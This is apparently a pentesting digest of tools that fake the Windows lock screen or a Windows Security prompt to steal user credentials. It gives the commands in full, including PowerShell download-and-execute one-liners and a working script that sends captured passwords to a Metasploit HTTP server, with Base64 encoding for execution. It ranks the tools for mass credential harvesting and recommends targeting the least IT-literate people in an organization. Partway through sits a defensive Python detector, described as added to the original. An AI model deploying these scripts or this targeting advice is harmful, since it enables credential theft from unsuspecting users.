Windows Credentials Phishing

On Windows family operating systems, it is normal for some programs and processes to request user credentials: for authentication (e.g. Outlook), to increase runtime privileges (User Account Control), or simply to unlock the Windows LockScreen. Simulating this Windows behavior allows a pentester to obtain user credentials and apply them later in the penetration test. This article is a digest of several common phishing programs that work by spoofing the LockScreen.


Modern pentesting techniques are often based on the C# programming language, as programs written in it can be executed through various frameworks (Cobalt Strike, Covenant, etc.).

1) The FakeLogonScreen utility was developed by Arris Huijgen in C#. It not only replaces the standard OS password input screen, but does so using the standard screen parameters set in the system, which increases the chances of not arousing suspicion and of successfully obtaining the user’s login credentials.

FakeLogonScreen – start
FakeLogonScreen – screen lock

When a password is entered on the fake login screen, FakeLogonScreen validates the credentials against AD or locally to determine whether the password was entered correctly. The password is then displayed in the pentester's console.

FakeLogonScreen – Credentials input

FakeLogonScreen also includes a second version of the executable, which saves the captured credentials locally to a user.db file on the infected machine. This file can be viewed using the type command:

type C:\Users\testTHUser3\AppData\Local\Microsoft\user.db
FakeLogonScreen – save to file user.db

2) The SharpLocker program was developed by Matt Pickford. Once started, it also replaces the original login screen.

SharpLocker – screen lock

Each character entered by the user is intercepted until the entire password is found. It’s worth noting, however, that this utility doesn’t perform password authentication and will remove everything that the user enters into the password field.

SharpLocker – password phishing

PowerShell

Credential prompts from Windows Security are very common, as software in an enterprise environment may regularly require additional confirmation of an action or reauthorization. Microsoft Outlook, for example, is one of the most prominent examples of such software, constantly requesting domain credentials from users.

1. The utility that masquerades as a Windows Security prompt is called CredsLeaker. To work properly, it requires a web server from which it receives all the necessary files and where the captured user credentials are saved, and PowerShell to send HTTP requests to that server. All subsequent commands are executed from the existing BAT file.

CredsLeaker – HTTP Delivery

Before running the run.bat file, you should make all necessary changes in the utility's configuration files. Once run.bat is run, the user will see a Windows Security window asking for their credentials.

CredsLeaker – phishing window

The query window will disappear only if valid user credentials are entered. The domain, computer name, username and password will be saved in the creds.txt file along the path below:

CredsLeaker – output to file creds.txt

2. Matt Nelson developed a PowerShell script that displays a Windows Security credential prompt and then checks the validity of what was entered. This window also cannot be closed by the user until valid credentials have been entered. The script can be executed remotely, and the credentials entered will be displayed in the console on the “attacker” machine:

 powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('')); Invoke-LoginPrompt
Invoke-LoginPrompt – remote call
Invoke-LoginPrompt – phishing window

3. The Nishang framework also includes a PowerShell script that creates a window prompting for user account credentials.

Import-Module C:\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish – local call and phishing window

The generated window states that the action requires confirmation by entering account credentials. More experienced users may suspect that this window was triggered by an application running in the background, but not everyone on the corporate network has this knowledge. The credentials that the user enters into the dialog box will be displayed in the console.

Invoke-CredentialsPhish – output of collected data

This script can also be run remotely:

powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('')); Invoke-CredentialsPhish

Rob Fuller described on his blog a credential phishing attack using Metasploit and PowerShell. The Metasploit Framework has modules that can capture user credentials from different protocols (FTP, SMB, HTTP, etc.). The module listed below is used to deploy a basic HTTP server with authentication:

use auxiliary/server/capture/http_basic

PowerShell is used to carry out the phishing attack: it generates a Windows Security prompt window and then transfers the collected credentials to the HTTP server previously created via Metasploit:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent", "Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('');

For the initial capture of credentials, the script has to be encoded as UTF-16LE and then converted to Base64:

cat popup.txt | iconv -t UTF-16LE
 cat popup.txt | iconv -t UTF-16LE | base64 -w0
Conversion of code into Base64

Executing this code, either locally or remotely, will cause the user to be prompted for authorization, supposedly by Windows Security.

powershell.exe -ep bypass -enc <base64> 
Credentials Phishing Window

The Metasploit module will receive the credentials as soon as they are entered by the user.

Metasploit HTTP Server – getting credentials
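
From the defender's side, the UTF-16LE plus Base64 wrapping described above is reversible, so process-creation logs can be triaged by decoding the -enc argument and searching it for strings that the commands on this page contain. The Python sketch below is an added example, not code from the original article or from any of the tools it covers; the indicator list, the function names and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Substrings taken from the commands shown on this page (compared lower-cased).
INDICATORS = {
    "promptforcredential": "credential prompt raised from script",
    "downloadstring": "script fetched over HTTP",
    "servercertificatevalidationcallback": "TLS certificate validation disabled",
    "invoke-loginprompt": "known credential-prompt script",
    "invoke-credentialsphish": "known credential-prompt script",
}
# -e, -ec, -enc ... -EncodedCommand followed by a Base64 blob.
ENC_RE = re.compile(r"\s-(?:ec|en[a-z]*|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
# -ep, -exec ... -ExecutionPolicy followed by "bypass".
BYPASS_RE = re.compile(r"\s-(?:ep|ex[a-z]*)\s+bypass\b", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -enc (Base64 of UTF-16LE text), or None."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad Base64 or bad UTF-16; both subclass ValueError
        return None


def triage(cmdline):
    """Return sorted findings for one process-creation command line."""
    findings = set()
    if BYPASS_RE.search(cmdline):
        findings.add("execution policy bypass")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.add("encoded command")
    haystack = (cmdline + " " + (decoded or "")).lower()
    findings.update(m for needle, m in INDICATORS.items() if needle in haystack)
    return sorted(findings)


# Constructed sample events; the blob is built here, not copied from a capture.
SAMPLE_SCRIPT = "$cred = $host.ui.promptforcredential('Failed Authentication','','u','D')"
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLES = [
    "powershell.exe -ep bypass -enc " + SAMPLE_BLOB,
    "powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line) or ["clean"], "<-", line[:50])
```

Feed triage() the command-line field of process-creation events (for example Windows event ID 4688 or Sysmon event ID 1) and treat any non-empty result as a lead to review, not as a verdict.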


The Metasploit Framework has a module that can raise the Windows Security window with a request for authorization from almost any process in the system. For this module to work correctly, you need to specify the working session and the process on whose behalf the Windows Security window will be shown.

use post/windows/gather/phish_windows_credentials
Metasploit Module – configuration

In this case, the * character tells the module to monitor all processes that are started on behalf of the system (NT Authority\System) and to call up a dialog box whenever such a process is started.

Metasploit Module – monitoring all processes

As soon as the new process starts, the user will be presented with a dialog box on behalf of this process, asking for authorization, allegedly to confirm further work.

Metasploit Module – phishing window

As soon as the user enters the credentials, they will be immediately displayed in the Metasploit console.

Metasploit Module – getting credentials

This module can also be configured to wait for a specific process to start.

Metasploit Module – obtaining credentials through the process notepad.exe



Lockphish is another utility that can perform a phishing attack that spoofs the Windows logon window. The login window template is stored on a PHP server and uses YouTube by default to redirect the user after they enter their login and password.

LockPhish – start

At this stage, it will be necessary to resort to social engineering to lure the user to the website where the lock screen files are located.

LockPhish – file download

Unlike all other utilities, the placement of the items on this lock screen may not be accurate, the authorization request will be displayed for Administrator rather than for the current user account, and the lock screen will be styled as the Windows 10 LockScreen. All of this can make the user very wary. This utility also has no mechanism to validate the password entered.

LockPhish – lock screen

After the user has entered their credentials, a redirect to will be performed.

LockPhish – redirect

Credentials will be displayed in the console.

LockPhish – collected credentials

The methods presented in this article will be effective if the pentester has already managed to gain a foothold in the system (get a stable login point), but cannot increase privileges or get user credentials in another way. When conducting such phishing attacks, you should select the target audience very carefully. Efficiency will be many times higher if the targets are the least IT-literate people in the organization.

Short verdict on all tested software


    • FakeLogonScreen. Looks as plausible as possible, using the standard parameters set in the system. It is able to validate the entered credentials. (Best choice)

    • SharpLocker. Doesn’t authenticate, the standard Windows wallpaper for the LockScreen is used, and the layout of the lock screen itself is shifted slightly to the right, which may alert the user. (Not recommended if you can apply FakeLogonScreen)

    • CredsLeaker. Easy to execute, generates an authentic window, but requires a web server to work. If you need to target one user at a time, the web server is rather a minus; if it is possible to run the script on all computers in the domain and mass “comb” the credentials, the web server is certainly a plus. (Recommended for mass gathering of credentials)

    • Invoke-LoginPrompt. Easy to implement, suitable for targeted use; the window it creates is styled after old or server versions of Windows. It may be suspicious to the user. (Recommended for use, but with caution)

    • Invoke-CredentialsPhish. Same as the one above.

    • Script from Rob Fuller. Integration with Metasploit, possibility of mass application, a bit of fiddling with the conversion. (Also great for mass data collection)

    • Metasploit module phish_windows_credentials. Full integration with Metasploit (it is a module, after all); the window it creates is in the style of an old Windows version. (Applicable, but consider the IT literacy of the victim)

    • LockPhish. On the one hand, a crooked lock screen, without authentication, and also without the current user (it always asks for the Administrator password). On the other hand, it is the only one that can work through a browser. Send the victim the link and wait. (Not recommended for use out of the box, but if you know the login of a particular victim, reconfigure it from Administrator to that login and it won’t be so bad anymore. It might even work.)


WARNING! All links in the articles may lead to malicious sites or contain viruses. Follow them at your own risk. Those who purposely visit the article know what they are doing. Do not click on everything thoughtlessly.

